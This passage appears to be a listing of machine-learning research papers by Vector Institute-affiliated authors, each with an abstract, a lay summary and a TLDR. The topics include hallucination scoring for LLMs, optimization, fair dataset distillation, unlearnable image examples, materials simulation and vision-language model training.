Large language models are increasingly used to produce long, free-form answers in settings where factual accuracy is essential. This raises a practical question: how can we tell whether such an answer is trustworthy or whether the model is fabricating? The most reliable existing checks are computationally expensive, decomposing each answer into individual claims and verifying every claim against a trusted reference, which can require hundreds of model queries per response.
We propose a substantially cheaper alternative. We prompt the model to answer the same question several times and convert each response into a numerical representation of its meaning via a separate embedding model. When the model is on firm ground, these representations align closely; when it is uncertain or fabricating, they tend diverge. The degree of divergence yields a simple score, and we show that greater divergence reliably indicates lower factual accuracy.
The approach requires no labelled data, no additional training, and no manual tuning, and is compatible with any standard text-representation model. We additionally introduce a more efficient procedure for grading the factual accuracy of long responses and release a large annotated dataset. Together, these contributions provide a low-cost, scalable signal for flagging unreliable model output before deployment.
TLDR: We introduce Semantic Isotropy, a geometry-inspired metric for assessing the trustworthiness of long-form language model outputs, and demonstrate its effectiveness and robustness across diverse models and evaluation settings.
Exploiting weight-space symmetries for approximating curvature
Artem Artemev, Rui Xia, Benjamin M. Boyd, Youjing Yu, Felix Dangel (former Vector Distinguished Postdoctoral Fellow), Guillaume Hennequin, Alberto Bernacchia
Abstract
Many machine learning techniques rely on approximating a loss function’s curvature, but this is notoriously hard to do at the scale of modern deep networks. Surprisingly, no previous work has exploited the curvature constraints that arise from well known weight-space symmetries in loss landscapes. By analytically averaging over group actions that leave the loss invariant, we construct structured Hessian approximations from single gradients that can be tractably estimated, stored, and inverted. The choice of user-specified symmetry group directly governs the trade-off between approximation accuracy and computational cost. Moreover, our framework provides a unifying theoretical lens for viewing existing methods; in particular, a specific choice of symmetry group recovers Shampoo/Muon-like curvature estimates. We validate our method on a range of network architectures, and deploy it to second-order optimization benchmarks, including a small language model. Our curvature estimation framework might find applications in other machine learning problems such as uncertainty estimation, continual learning, compression/pruning, training data attribution, and more.
Summary
Training neural networks faster requires knowing not just the direction to update parameters (the gradient), but also the curvature of the loss landscape. Computing this curvature exactly is infeasible for large models. We observe that neural networks have built-in symmetries. For instance, swapping two neurons and their connections leaves the network unchanged. From a single gradient, these symmetries let us analytically infer gradients at many equivalent configurations, and we show how to distill this information into a curvature estimate. Larger symmetry groups yield cheaper but coarser estimates; smaller groups yield richer ones. We prove that a specific middle-ground choice produces updates mathematically equivalent to Shampoo and Muon, two popular optimizers, revealing a previously unknown connection between these methods and the network’s architectural symmetries.
TLDR: Approximation of curvature exploiting weight-space symmetries
Fair Dataset Distillation via Cross-Group Barycenter Alignment
Mohammad Hossein Moslemi, Nima Hosseini Dashtbayaz, Zhimin Mei, Boyu Wang (Vector Faculty Affiliate), Bissan Ghaddar
Abstract
Dataset Distillation aims to compress a large dataset into a small synthetic one while maintaining predictive performance. We show that as different demographic groups exhibit distinct predictive patterns, the distillation process struggles to simultaneously preserve informative signals for all subgroups, regardless of whether group sizes are mildly or severely imbalanced. Consequently, models trained on distilled data can experience substantial performance drops for certain subgroups, leading to fairness gaps. Crucially, these gaps do not disappear by merely correcting group imbalance, since they stem from fundamental mismatches in subgroup predictive patterns rather than from sample-size disparities alone. We therefore formally analyze the interaction between these two sources of bias and cast the solution as identifying a group-imbalance-agnostic barycenter of the predictive information that induces similar representations across all subgroups. By distilling toward this shared aggregate representation, we show that group fairness concerns can be reduced. Our approach is compatible with existing distillation methods, and empirical results show that it substantially reduces bias introduced by dataset distillation. Code is available at https://github.com/mhmoslemi/COBRA.
Summary
Modern AI training often needs huge datasets, which is expensive in storage and compute. Dataset distillation solves this by compressing a large dataset into a tiny synthetic one that trains models just as well. However, we discovered that this compression can quietly amplify unfairness: models trained on distilled data can perform much worse for minority demographic groups than models trained on the original data.
We traced the problem to how distillation builds its target. Standard methods average across all samples, which lets majority groups dominate and pushes minority patterns out of the compressed dataset. We show that this bias is not just about group sizes; it also depends on how different demographic groups are positioned in the model’s internal representation space, and we formalize this through an upper bound on the resulting fairness gap.
Our method, COBRA, computes a balanced center point that stays equally close to every demographic group, then distills the synthetic dataset toward that fair target instead. Across seven benchmarks and four distillation methods, COBRA reduces fairness gaps substantially while preserving or improving accuracy.
As compressed datasets become common in sensitive areas like healthcare and finance, COBRA helps ensure these efficiency gains do not come at the cost of fairness for underrepresented groups.
TLDR: We propose a fairness-aware dataset distillation method targeting cross-group shared signals, reducing representational conflict and lowering equalized odds difference on fairness benchmarks, with strong cross-architecture generalization.
FedLog: Personalized Federated Classification with Less Communication and More Flexibility
Haolin Yu, Guojun Zhang, Hongliang Li, Pascal Poupart (Vector Faculty Member)
Abstract
Federated representation learning (FRL) aims to learn personalized federated models with effective feature extraction from local data. FRL algorithms that share the majority of the model parameters face significant challenges with huge communication overhead. This overhead stems from the millions of neural network parameters and slow aggregation progress of the averaging heuristic. To reduce the overhead, we propose FedLog, which shares sufficient data summaries instead of raw model parameters. The data summaries encode minimal sufficient statistics of an exponential family, and Bayesian inference is utilized for global aggregation. FedLog helps reduce message sizes and communication frequency. We prove that the shared messages are minimal sufficient statistics and theoretically analyze the convergence rate of FedLog. To further ensure formal privacy guarantees, we extend FedLog with the differential privacy framework. Empirical results demonstrate high learning accuracy with low communication overhead of our method.
Few-Shot Design Optimization By Exploiting Auxiliary Information
Arjun Mani, Carl Vondrick, Richard Zemel (Vector Faculty Member)
Abstract
Many real-world design problems involve optimizing an expensive black-box function f(x), for which Bayesian Optimization is a sample-efficient framework. However, while the basic black-box setting returns a scalar reward, real-world experiments often generate a wealth of useful information. We introduce a new setting where an experiment generates high-dimensional auxiliary information h(x) along with f(x); moreover, a history of relevant, previously-solved tasks is available for accelerating optimization. We develop a novel method based on a neural model which predicts f(x) for unseen designs given a few-shot context containing observations of h(x). We evaluate our method on two challenging domains, robotic hardware design and hyperparameter tuning. On both domains, our method achieves improved few-shot prediction and faster design optimization, outperforming several multi-task optimization methods.
Summary
Design problems are ubiquitous across engineering and the natural sciences. For instance, a biologist may want to design a drug that binds as tightly as possible to a pathogen, and a roboticist might want to design a robot arm that can grasp objects delicately and stably. Often, designing good solutions involves running real-world experiments, e.g. a wet-lab experiment to test drug binding. This experiment is a “black-box”, where you can put in a design, and you get out a number measuring how well the design performed. The goal is to optimize this metric with as few experiments as possible.
A number of AI methods exist that intelligently decide which design to try next, based on the experiments that have come before. However, this basic “black-box” setting, which only returns a single number measuring a design, is highly simplified. Modern scientific or engineering labs have advanced experimental capabilities, which are capable of making several observations about a system. For instance, in robot design, trying out a robot arm may generate a high volume of sensor data (from cameras, or tactile sensors) along with a final performance measure of the design. Therefore, we introduce a new optimization setting, where a trial generates high-dimensional “extra information” along with the number measuring performance. This extra information can be very useful for understanding not just that a design fails, but *how* exactly the design fails, and could be altered to succeed.
We introduce a novel AI method for this setting. This method involves a neural network model, which is trained on a history of design tasks that have already been solved. It learns how to take in a small set of evaluated designs for a task, which includes observations of this ‘extra information’, and predict which un-evaluated designs might have high reward and should be tried out. After being trained, this model can be applied to a new design task, where it iteratively predicts which design to try next, and tries out that design, repeating until a satisfactory design is found.
We apply our method to multiple design problems. One problem involves designing robotic grippers whose shape must be customized to grasp specific objects (e.g. a bottle). Each time the gripper makes contact with the object, it gets `extra’ tactile feedback along with a reward for the grasp. We show that our method can grasp new objects that it did not see during training, and can quickly optimize the gripper design for the object after only a few interactions with that object. It finds successful gripper designs for a new object significantly faster than current methods. Thus, our work takes a step towards more capable systems for AI-driven design, which can conduct effective design and discovery in realistic scientific and engineering environments.
TLDR: We introduce a new design optimization setting where a trial provides high-dimensional auxiliary information beyond reward, and propose a novel approach for this setting.
FiGuRO – Intrinsic Dimension Estimation for Multi-Modal Data
Viktoria Schuster, Sana Tonekaboni (Vector Distinguished Postdoctoral Fellow), Caroline Uhler
Abstract
Determining the complexity, or Intrinsic Dimension (ID), of data is fundamental to efficient and interpretable representation learning. This is particularly challenging in multi-modal settings when trying to learn disentangled representations for shared and private information. Existing techniques leave a critical gap: they are often static, uni-modal, or in the case of contrastive methods, adapt only to the shared ID implicitly. We introduce Fidelity-Guided Rank Optimization (FiGuRO), a framework for approximating the ID of uni- and multi-modal data under constraints of model capacity and hyperparameters. FiGuRO learns the dimensions of low-rank projections using truncated singular value decomposition and an algorithm that determines when to reduce or increase dimension and in which latent space. Disentanglement of shared and private information arises as an emergent property of this optimization, eliminating the need for complex auxiliary loss functions. We demonstrate that FiGuRO outperforms existing ID estimation techniques and is more robust to hyperparameter changes. Across simulations and real-world data, FiGuRO captures distinct ID scales and varying subspace ratios, and decomposes shared and private information successfully. Furthermore, we show that FiGuRO can be applied to modern uni-modal pretrained models, enabling efficient, post-hoc disentanglement of multi-modal representations.
Summary
Modern AI models often learn from multiple sources (modalities) simultaneously, such as combining a patient’s medical scans with their genetic data. To make these models efficient and trustworthy, scientists must find their true underlying complexity (the absolute minimum number of factors needed to describe the data). However, existing tools struggle to differentiate between information shared across sources and details unique to just one.
To solve this, we developed a framework called FiGuRO that automatically estimates the complexity of both shared and unique information streams in a single step. The central algorithm expands or shrinks FiGuRO’s representations based on how perfectly it can reconstruct the original data. As it balances this process, FiGuRO untangles shared concepts from modality-specific details.
We demonstrate FiGuRO’s success on diverse datasets, including paired audio-image digits and complex biological measurements. By revealing precisely how much new information each source contributes, FiGuRO helps researchers determine if collecting difficult or expensive data is truly worthwhile. Ultimately, this makes multi-source AI systems more lightweight and transparent.
TLDR: We present FiGuRO, a framework that estimates the intrinsic dimension of multi-modal data by optimizing rank via SVD in disentangled latent spaces under a fidelity constraint.
FlexRank: Nested Low-Rank Knowledge Decomposition for Adaptive Model Deployment
Spotlight paper
Riccardo Zaccone, Stefanos Laskaridis, Marco Ciccone (Vector Distinguished Postdoctoral Fellow), Samuel Horváth
Abstract
The growing scale of deep neural networks, encompassing large language models (LLMs) and vision transformers (ViTs), has made training from scratch prohibitively expensive and deployment increasingly costly. These models are often used as computational monoliths with fixed cost, hindering adaptive deployment across different cost budgets.
We argue that nested components, ordered by importance, can be extracted from pretrained models and selectively activated within the available computational budget. To this end, our proposed FlexRank method leverages low-rank weight decomposition with nested, importance-based consolidation to extract submodels of increasing capabilities. Our approach enables a _“train-once, deploy-everywhere”_ paradigm offering a graceful trade-off between cost and performance without training from scratch for each budget – advancing practical deployment of large models.
Summary
Modern AI models can be powerful, but they are often expensive to run: the same large model is usually used whether a device has abundant computing power or very little. This makes deployment inefficient, especially across phones, laptops, servers, and applications where some inputs are easier than others. We introduce FlexRank, a method that turns one pretrained AI model into a family of smaller and larger versions that all share the same underlying weights. The key idea is to break the model’s knowledge into ordered pieces, so the most important pieces are used first and additional pieces can be added when more computation is available. After identifying these nested pieces, FlexRank refines them by teaching every smaller version to imitate the original full model. This creates a “train once, deploy everywhere” model that can smoothly trade accuracy for speed or memory without training and storing many separate models. We show that this works across language models and vision models, including large transformers. FlexRank could make advanced AI easier to deploy on diverse hardware while reducing unnecessary computation.
TLDR: A method to decompose large pretrained models into nested low-rank adaptive models
Frequentist Consistency of Prior-Data Fitted Networks for Causal Estimation
Valentyn Melnychuk, Vahid Balazadeh, Stefan Feuerriegel, Rahul G. Krishnan (Vector Faculty Member)
Abstract
Foundation models based on prior-data fitted networks (PFNs) have shown strong empirical performance in causal inference by framing the task as an in-context learning problem. However, it is unclear whether PFN-based causal estimators provide uncertainty quantification that is consistent with classical frequentist estimators. In this work, we address this gap by analyzing the frequentist consistency of PFN-based estimators for the average treatment effect (ATE). (1) We show that existing PFNs, when interpreted as Bayesian ATE estimators, can exhibit prior-induced confounding bias: the prior is not asymptotically overwritten by data, which, in turn, prevents frequentist consistency. (2) As a remedy, we suggest employing a calibration procedure based on a one-step posterior correction (OSPC). We show that the OSPC helps to restore frequentist consistency and can yield a semi-parametric Bernstein-von Mises theorem for calibrated PFNs (i.e., both the calibrated PFN-based estimators and the classical semi-parametric efficient estimators converge in distribution with growing data size). (3) Finally, we implement OSPC through tailoring martingale posteriors on top of the PFNs. In this way, we are able to recover functional nuisance posteriors from PFNs, required by the OSPC. In multiple (semi-)synthetic experiments, PFNs calibrated with our martingale posterior OSPC produce ATE uncertainty that (i) asymptotically matches frequentist uncertainty and (ii) is well calibrated in finite samples in comparison to other Bayesian ATE estimators.
Summary
Many decisions in medicine, public policy, and business depend on estimating what would happen if we changed an action, such as giving a treatment or introducing a policy. New AI systems called prior-data fitted networks can make these estimates quickly because they learn from many simulated datasets before seeing a real one. However, we found that these systems can be overconfident in causal settings: the simulated worlds used for training often contain too little confounding, meaning too few cases where treatment choices and outcomes are linked through shared background factors. As a result, the AI may underestimate how uncertain it should be about the true effect of an intervention. We propose a calibration method that adjusts the AI’s estimate using a correction inspired by classical causal inference. This correction makes the AI’s uncertainty behave more like uncertainty from well-established statistical estimators, while still keeping the speed and flexibility of prior-data fitted networks. To make the correction practical, we also show how to recover the needed uncertainty about hidden modeling components from the network’s predictions. Across several synthetic and semi-synthetic benchmarks, the corrected method provides more reliable uncertainty than naïvely using the networks as causal estimators. Our work shows that foundation models for tabular data can be useful for causal inference, but only when their uncertainty is carefully calibrated.
TLDR: We show that PFN-based ATE estimators can be frequentist-inconsistent due to prior-induced confounding, and we restore consistency and calibrated uncertainty via one-step posterior corrections using martingale posteriors.
From Seeing to Thinking: Decoupling Perception and Reasoning Improves Post-Training of Vision-Language Models
Juncheng Wu, Hardy Chen, Haoqin Tu, Xianfeng Tang, Freda Shi (Vector Faculty Member), Hui Liu, Hanqing Lu, Cihang Xie, Yuyin Zhou
Abstract
Recent advances in vision-language models (VLMs) emphasize long chain-of-thought reasoning; yet, we find that their performance on visual tasks is primarily limited by a lack of visual perception as opposed to reasoning itself. In this work, we systematically study the interplay between perception and reasoning in VLM post-training by decomposing their capabilities into three separate training stages: visual perception, visual reasoning, and textual reasoning, incorporating specialized training data. We demonstrate that visual perception (a) requires targeted optimization with specialized data; (b) serves as a fundamental scaffold that should be solidified through staged training before refining visual reasoning; and (c) is more effectively learned via RL than caption-based SFT. Our experiments across multiple VLMs demonstrate that staged training consistently improves both visual perception and reasoning performance over merged training. Notably, models trained with our approach achieve 1.5% higher reasoning accuracy with 20.8% shorter reasoning traces, suggesting that superior perception reduces the need for excessive reasoning. Furthermore, we show that this capability-based staging represents a new curriculum dimension orthogonal to traditional difficulty-based curricula, and combining both yields further additive gains. Our staged-training models achieve superior performance among open-weight VLMs, establishing advanced results on several visual math and perception (e.g., +5.2% on WeMath and +3.7% on RealWorldQA) tasks compared with the base counterpart.
Summary
Modern AI systems can look at a picture and answer questions about it — for example, solving a geometry problem shown in a diagram. To make them better, researchers have mostly taught these systems to “think” longer, working through problems step by step. But when we examined where they go wrong, we found the real bottleneck was not faulty thinking but faulty seeing: in nearly 87% of mistakes, the model had simply misread the image. Worse, thinking harder did not help — once the model misread a picture, every extra step of reasoning was built on that same wrong observation. We argue that seeing should be treated as its own skill and trained separately, before reasoning. We built a training recipe that strengthens a model’s visual perception first, then layers reasoning on top, using dedicated data for each stage. We also created a way to turn captioned-image datasets into perception training data. Models trained this way are both more accurate and more efficient: they reason about 21% more concisely because they no longer need to second-guess what they saw. The lesson is simple — an AI that sees clearly does not need to overthink.
TLDR: See first, then think. Visual perception — not reasoning length — is the dominant bottleneck for VLMs. We post-train along a new capability axis, orthogonal to the classic difficulty curriculum.
FUSE: Full‑spectrum Unlearnable Examples via Spectral Equalization
Jiale Cai, Gezheng Xu, Zhihao Li, Ruiyi Fang, Ruizhi Pu, di wu, Qicheng Lao, Charles X. Ling, Boyu Wang (Vector Faculty Affiliate)
Abstract
Unlearnable examples (UEs) protect training data by injecting imperceptible perturbations so that models fail to extract exploitable representations. In this paper, we reveal that existing UEs exhibit a critical failure once low-pass filtering is applied, indicating that the effective perturbation signals for unlearnability concentrate predominantly in high frequencies. Hence, we argue that reliable UEs should remain effective across the full spectrum. To this end, we propose **F**ull-spectrum **U**nlearnable Examples via **S**pectral **E**qualization (**FUSE**), which aims to generate spectrum-agnostic perturbations by equalizing the contributions from different bands and enforcing cross-band consistency. Specifically, FUSE adopts a Random Spectral Masking (RSM) strategy during generator training, which randomly removes a contiguous frequency band, forcing the remaining bands to maintain unlearnability. In addition, FUSE further integrates Cross-Band Guidance (CBG), which enforces mutual consistency between high- and low-frequency components, thereby further enhancing low-frequency unlearnability and regulating high-frequency perturbations to preserve the semantic fidelity of images. Extensive experiments across multiple datasets, architectures, and spectral filtering demonstrate the strong protection achieved by FUSE.
Summary
Many modern AI systems are trained on large collections of online images, often without the creators’ knowledge or permission. One proposed way to protect such data is to slightly modify images so that the changes are invisible to humans but prevent AI models from learning useful information from them. These modified images are called unlearnable examples.
In this work, we show that many existing protection methods fail once images are slightly smoothed or compressed, because they mainly rely on fragile high-frequency signals that are easy to remove. To address this problem, we propose a new method called FUSE, which spreads the protective signal more broadly across the image instead of concentrating it in only one type of visual pattern. As a result, the protection remains effective even after common image processing operations.
We evaluate FUSE on multiple datasets and AI model architectures, and show that it consistently provides stronger and more reliable protection than previous approaches. Our findings suggest that future data protection methods should be designed to remain robust under realistic image transformations and processing conditions.
Global Plane Waves From Local Gaussians: Periodic Charge Densities in a Blink
Jonas Elsborg, Felix Aertebjerg, Luca Anthony Thiede, Alán Aspuru-Guzik (Vector Faculty Member), Tejs Vegge, Arghya Bhowmik
Abstract
We introduce ELECTRAFI, a fast, end-to-end differentiable model for predicting periodic charge densities in crystalline materials. ELECTRAFI constructs anisotropic Gaussians in real space and exploits their closed-form Fourier transforms to analytically evaluate plane-wave coefficients via the Poisson summation formula. This formulation delegates non-local and periodic behavior to analytic transforms, enabling reconstruction of the full periodic charge density with a single inverse FFT. By avoiding explicit real-space grid probing, periodic image summation, and spherical harmonic expansions, ELECTRAFI matches or exceeds state-of-the-art accuracy across periodic benchmarks while being up to $633\times$ faster than the strongest competing method, reconstructing crystal charge densities in a fraction of a second. When used to initialize DFT calculations, ELECTRAFI reduces total DFT compute cost by up to $\sim$20 \%, whereas slower charge density models negate savings due to high inference times. Our results show that accuracy and inference cost jointly determine end-to-end DFT speedups, and motivate our focus on efficiency.
Summary
Many important materials are first studied on computers before they are made in the lab. A common method for doing this is called density-functional theory, or DFT, which predicts how electrons are arranged inside a material. DFT is very useful, but it can be slow because the computer has to repeatedly refine the electron density until it finds a stable answer.
In this paper, we use machine learning to provide a much better starting guess, which helps the DFT calculations finish faster by starting closer to the true solution. The challenge is that the machine-learning model itself also has to be fast. If it is not, the time saved in DFT is lost when making the prediction. We built ELECTRAFI, a model that predicts electron densities in crystals using a large set of simple 3D “blobs” called Gaussians. Instead of checking every point in space one by one, ELECTRAFI converts these blobs directly into the mathematical format used by many DFT programs. This makes the prediction both naturally periodic, like a crystal, and very fast.
We found that ELECTRAFI is as accurate as the best existing methods while being hundreds of times faster. When used inside real DFT calculations, it reduces the total compute time by up to about 20%.
This is significant because billions of compute hours are spent globally on DFT calculations each year, and methods like ELECTRAFI can help make large-scale materials simulation faster, cheaper, and less energy-intensive.
TLDR: ultra-fast charge density prediction in periodic systems
Gradient Smoothing: Coupling Layer-wise Updates for Improved Optimization
Haoming Meng, Anton Sugolov, Vardan Papyan (Vector Faculty Member)
Abstract
Deep neural networks with repeated blocks, such as transformers and ResNets, often exhibit structured relationships across layers that emerge during training. Motivated by this observation, we introduce a general paradigm of *Depth-wise Gradient Augmentation*, in which the update applied to a layer may depend on the base optimizer updates computed for other layers. We study an instantiation of this idea, termed *Gradient Smoothing*, which couples optimizer updates across depth and admits a natural interpretation as a structured preconditioning method. Our framework operates directly on block-wise update vectors produced by arbitrary base optimizers (e.g., SGD, Adam, Muon), applying structured depth-wise smoothing operators such as local weighted averaging with minimal computational overhead. We evaluate Gradient Smoothing across a diverse set of architectures and training regimes, including language model pretraining, RL post-training of LLMs on reasoning tasks, diffusion modeling, and image classification with Vision Transformers. Across these settings, Gradient Smoothing consistently improves convergence and generalization performance without modifying model architectures or training objectives. We further show that smoothing promotes more structured representation evolution across depth, suggesting a connection between structured update coupling and the internal organization of learned representations. These results position Gradient Smoothing as a simple and broadly applicable approach for improving training in modern deep networks.
Summary
Modern AI systems such as large language models, vision transformers, and diffusion models are built from many repeated architectural layers. Although these layers often learn related behaviors during training, today’s optimization algorithms typically update each layer independently.
We introduce a new training framework called Depth-wise Gradient Augmentation, which allows layers to share information through their optimization updates. We study a simple instance of this idea called Gradient Smoothing, where updates from neighboring layers are combined before being applied to the model.
Gradient Smoothing can be added on top of existing training methods with very little computational cost and does not require changing the model architecture or training objective. We tested the method on a wide range of machine learning tasks, including language model pretraining, reasoning-focused reinforcement learning, image classification, and image generation.
Across these settings, Gradient Smoothing consistently improved training efficiency and model performance. We also found that it encourages representations to evolve more smoothly and coherently across layers. These results suggest that leveraging the structure shared across layers can be a simple and broadly useful way to train modern deep learning systems more effectively.
Hierarchical Policy Learning via Spectral Decomposition
Shuxin Cao, Liquan Wang, Walker Byrnes, Yiye Chen, Yilun Du, Animesh Garg (Vector Faculty Affiliate)
Abstract
In this paper, we identify a semantic decomposition in robot action sequences, separating task-level motion intent from execution-level refinements. By analyzing actions in the spectral domain using the discrete cosine transform (DCT), we observe that low-frequency components capture global motion trajectories, while high-frequency components encode precise timing, alignment, and contact behaviors. Motivated by this structure, we propose Causal Spectral Policy (CSP), which models action generation as a causal coarse-to-fine process: coarse motion is predicted from observation and language, and fine corrections are generated conditionally on the realized trajectory. Across simulation and real-world evaluations, CSP consistently outperforms strong baselines on precision-sensitive manipulation tasks. Additionally, we propose human-inspired teleoperation noise injection as a data augmentation method under which our approach demonstrates strong robustness to noisy demonstrations.
Summary
Teaching robots to manipulate objects precisely is hard because good motion requires both a correct overall trajectory and tiny last-moment corrections, and these two things need to be learned differently. We show that converting robot movements into frequency components naturally separates these two levels. Our method, CSP, learns coarse motion first, then generates fine corrections conditioned on it. This improves performance on precision tasks and makes learning more robust to the noisy demonstrations that arise when humans operate robots remotely.
IDRBench: Understanding the Capability of Large Language Models on Interdisciplinary Research
Yuanhao Shen, Daniel de Sousa, Ricardo de Andrade Nascimento, Hongyu Guo, Xiaodan Zhu (Vector Faculty Member)
Abstract
Innovation is a key driving force of human civilization. As the body of knowledge has grown considerably, bridging knowledge across different disciplines, where significant innovation often emerges, has become increasingly challenging. The recent advancements in machine learning models, particularly Large Language Models (LLMs), have provided effective access to extensive knowledge sources and shown impressive abilities in reasoning, rendering significant opportunities for interdisciplinary discovery. Our research aims to understand the capabilities of state-of-the-art LLMs in integrating knowledge from different fields for interdisciplinary research (IDR). To address this fundamental problem, we introduce IDRBench, a pioneering framework that includes both datasets and evaluation tasks: (1) IDR Paper Identification, (2) IDR Idea Integration, and (3) IDR Idea Recommendation. Our study on ten mainstream LLMs provides a comprehensive analysis of their behavior and establishes benchmarks and baselines for future research. To the best of our knowledge, IDRBench is the first to provide a comprehensive investigation of LLMs’ IDR capability.
Summary
Many important discoveries happen when ideas from different fields are brought together, but finding meaningful connections across disciplines is becoming harder as scientific knowledge keeps growing. Large language models, such as ChatGPT-like systems, can read and reason over large amounts of text, so they may help researchers discover connections that would otherwise be missed. However, we still do not know how well these models can actually understand, evaluate, and recommend interdisciplinary research ideas.
In this work, we introduce IDRBench, a new benchmark for testing whether large language models can support interdisciplinary discovery. IDRBench evaluates models on three tasks: identifying interdisciplinary papers, explaining how ideas from different fields can be integrated, and recommending promising cross-disciplinary research directions. We use this benchmark to study ten widely used language models and compare their strengths and weaknesses.
Our results provide the first comprehensive picture of how current language models perform on interdisciplinary research tasks. This work can help researchers better understand when LLMs are useful for scientific discovery, where they still fail, and how future AI tools for research can be improved.
TLDR: We introduce a novel benchmark to understand LLM’s interdisciplinary research capabilities.
Inverse Entropic Optimal Transport Solves Semi-supervised Learning via Data Likelihood Maximization
Mikhail Persiianov, Arip Asadulaev, Nikita Andreev, Nikita Starodubcev, Dmitry Baranchuk, Anastasis Kratsios (Vector Faculty Affiliate), Evgeny Burnaev, Aleksandr Korotin
Abstract
Learning conditional distributions $\pi^\star(\cdot|x)$ is a central problem in machine learning, which is typically approached via supervised methods with paired data $(x,y) \sim \pi^\star$. However, acquiring paired data samples is often challenging, especially in problems such as domain translation. This necessitates the development of *semi-supervised* models that utilize both limited paired data and additional unpaired i.i.d. samples $x \sim \pi^\star_x$ and $y \sim \pi^\star_y$ from the marginal distributions. The usage of such combined data is complex and often relies on heuristic approaches. To tackle this issue, we propose a new learning paradigm that integrates both paired and unpaired data seamlessly using data likelihood maximization techniques. We demonstrate that our approach also connects intriguingly with inverse entropic optimal transport (OT). This finding allows us to apply recent advances in computational OT to establish an *end-to-end* learning algorithm to get $\pi^\star(\cdot|x)$. In addition, we derive the universal approximation property, demonstrating that our approach can theoretically recover true conditional distributions with arbitrarily small error. Finally, we demonstrate through empirical tests that our method effectively learns conditional distributions using paired and unpaired data simultaneously.
Summary
Machine learning systems often need to learn relationships between two types of data. For example, a system may need to translate images between styles, predict weather conditions from sensor measurements, or generate outputs based on limited examples. Most existing methods require large collections of perfectly matched input-output pairs for training. However, in many real-world applications, such paired data is expensive or difficult to obtain, while separate collections of inputs and outputs are much easier to collect.
In this work, we introduce a new method that can learn from both a small amount of paired data and a large amount of unpaired data at the same time. Our approach is based on maximizing how well the model explains the observed data, while also drawing inspiration from optimal transport, a mathematical framework for comparing and transforming probability distributions.
We show theoretically that our method can recover complex relationships between domains and provide an efficient algorithm for training it in practice. In experiments on synthetic tasks, weather prediction, image translation, and classification, our approach consistently outperforms existing semi-supervised methods, especially when only a limited number of paired examples are available. For example, our method can learn realistic image translations and accurate probabilistic weather forecasts while requiring substantially less paired supervision than standard approaches.
Our findings suggest that combining paired and unpaired data through principled likelihood-based learning can significantly improve data efficiency and reliability in machine learning systems.
Local MAP Sampling for Diffusion Models
Shaorong Zhang, Rob Brekelmans (former Vector Distinguished Postdoctoral Fellow), Greg Ver Steeg
Abstract
Diffusion Posterior Sampling (DPS) provides a principled Bayesian approach to inverse problems by sampling from $p(x_0 \mid y)$. While posterior sampling is valuable for capturing uncertainty and multi-modality, many classical and practical inverse problem settings ultimately prioritize accurate point estimation—most notably the MAP estimator, which has long served as a standard reconstruction objective in imaging and scientific applications. We introduce Local MAP Sampling (LMAPS), a new inference framework that iteratively solving local MAP subproblems along the diffusion trajectory. This perspective clarifies their connection to global MAP and DPS, offering a unified probabilistic interpretation for optimization-based methods. Building on this foundation, we develop practical algorithms with a covariance approximation motivated by Gaussian prior assumption, a reformulated objective for stability and interpretability. Across a broad set of image restoration and scientific tasks, LMAPS achieves state-of-the-art performance.
Summary
AI systems called diffusion models can generate highly realistic images by gradually turning random noise into structured content. Beyond creating images from scratch, they are increasingly used to solve “inverse problems” — tasks such as sharpening blurry photos, filling in missing regions of an image, reconstructing MRI scans from limited measurements, or imaging black holes from sparse radio telescope data. We introduce Local MAP Sampling (LMAPS), a method that at every step of the diffusion process searches for the single most likely clean image consistent with both the current noisy state and the observed measurement. This perspective unifies and clarifies several earlier approaches under one principled framework. Across a wide range of image restoration tasks and scientific problems — including MRI reconstruction and black hole imaging — LMAPS produces sharper and more accurate reconstructions than existing methods, often at lower computational cost.
Long Grounded Thoughts: Synthesizing Grounded Visual Problems and Distilling Reasoning Chains at Scale
David Acuna, Chao-Han Huck Yang, Yuntian Deng (Vector Faculty Affiliate), Jaehun Jung, Ximing Lu, Prithviraj Ammanabrolu, Hyunwoo Kim, Yuan-Hong Liao, Yejin Choi
Abstract
Despite rapid progress, multimodal reasoning still lacks a systematic approach to synthesize large-scale vision-centric datasets beyond visual math. We introduce a framework able to synthesize vision-centric problems spanning diverse levels of complexity, and the resulting dataset with over 1M high-quality problems including: reasoning traces, preference data, and instruction prompts supporting SFT, offline and online RL. Our vision-centric synthesis framework uses a two-stage process focusing on: (1) generating diverse verifiable questions from existing images at scale, and (2) creating complex compositional visual problems by merging simpler questions.
Remarkably, finetuning Qwen2.5-VL-7B on our data outperforms existing open-data baselines across evaluated vision-centric benchmarks, and our best configurations match or surpass strong closed-data models such as MiMo-VL-7B-RL on V*Bench, CV-Bench and MMStar-V. Notably, despite being entirely vision-centric, our data transfers positively to text-only reasoning (MMLU-Pro, +3.7%) and audio reasoning (MMAU, +1.32%), demonstrating its effectiveness. Similarly, despite containing no embodied visual data, we observe notable gains (NiEH, +8.8%) when evaluating open-ended embodied QA. Lastly, we use our data to comprehensively analyze at scale (1M+) the entire VLM post-training pipeline showing that (i) SFT on high-quality data with cognitive behaviours on reasoning traces is essential to scale online RL, (ii) offline RL could match online RL’s performance while disaggregating compute demands, and, (iii) SFT on high quality data also improve out-of-domain, cross-modality transfer.
Summary
This work introduces a way to automatically create over one million image-based questions that help multimodal AI systems reason better about what they see. By focusing on specific objects and combining simple questions into harder ones, the method generates data that teaches models to reasoning about what they see, check their answers and recover from mistakes. This improves performance on visual tasks and also shows benefits for text, audio reasoning and emboddied reasoning.
TLDR: A data generation a framework to synthesize vision-centric problems spanning diverse levels of complexity, and dataset with over 1M high-quality problems including supporting SFT, offline and online RL.
The Mechanistic Emergence of Symbol Grounding in Language Models
Shuyu Wu, Ziqiao Ma, Xiaoxi Luo, Yidong Huang, Josue Torres-Fonseca, Freda Shi (Vector Faculty Member), Joyce Chai
Abstract
Symbol grounding (Harnad, 1990) describes how symbols such as words acquire their meanings by connecting to real-world sensorimotor experiences. Recent work has shown preliminary evidence that grounding may emerge in (vision-)language models trained at scale without using explicit grounding objectives. Yet, the specific loci of this emergence and the mechanisms that drive it remain largely unexplored. To address this problem, we introduce a controlled evaluation framework that systematically traces how symbol grounding arises within the internal computations through mechanistic and causal analysis. Our findings show that grounding concentrates in middle-layer computations and is implemented through the aggregate mechanism, where attention heads aggregate the environmental ground to support the prediction of linguistic forms. This phenomenon replicates in multimodal dialogue and across architectures (Transformers and state-space models), but not in unidirectional LSTMs. Our results provide behavioural and mechanistic evidence that symbol grounding can emerge in language models, with practical implications for predicting and potentially controlling the reliability of generation.
Summary
